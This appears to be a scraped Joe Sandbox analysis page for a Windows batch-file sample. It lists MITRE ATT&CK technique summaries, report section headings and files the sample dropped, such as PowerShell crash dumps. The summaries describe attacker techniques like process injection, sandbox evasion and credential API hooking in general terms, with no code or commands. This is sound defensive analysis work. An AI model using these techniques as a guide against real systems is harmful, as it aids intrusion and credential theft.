Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_3_158709a0000_svchost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 169ee3feb2000ee2d0486e255a8b31a50d7b388d9299a103b641fc723a4832d7
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 61618BB6508FC4C1EB619B15E8403DAB7A0F7C9B99F244215EB992BB99DF78C191CB00

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1 (2).cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_4b8d65543863c75899b0bf72ba836e70e19edff4_e3b0f337_15db468f-fd21-4114-bf3d-c1f16af8e730\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_powershell.exe_4b8d65543863c75899b0bf72ba836e70e19edff4_e3b0f337_524291a7-4586-471e-9996-599bcf79e603\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER978A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER999F.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99EE.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD55.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFF6.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD054.tmp.xml

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agdswqj5.see.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g551fzbs.jsj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4fx5gc4.luo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbl2amhi.n5x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjrvekz5.vno.ps1

Windows Analysis Report
1 (2).cmd

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre